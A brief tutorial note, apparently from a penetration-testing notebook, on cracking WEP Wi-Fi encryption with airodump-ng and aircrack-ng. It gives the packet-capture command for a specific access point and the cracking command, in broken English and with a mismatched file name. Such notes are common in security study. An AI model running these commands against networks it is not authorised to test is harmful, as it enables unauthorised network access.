WEP cracking
Passive Attack which attacker Sniff packet on target network and save it in file call wep-test

airodump-ng wlan0 --channel 5 --bssid D8:29:18:0A:08:91 --write wep-test
Use Aircrack-ng tool
which crack WEP by initialization vector
aircrack-ng web-test-*
need more than 5000 IVs each action is IVs

Last updated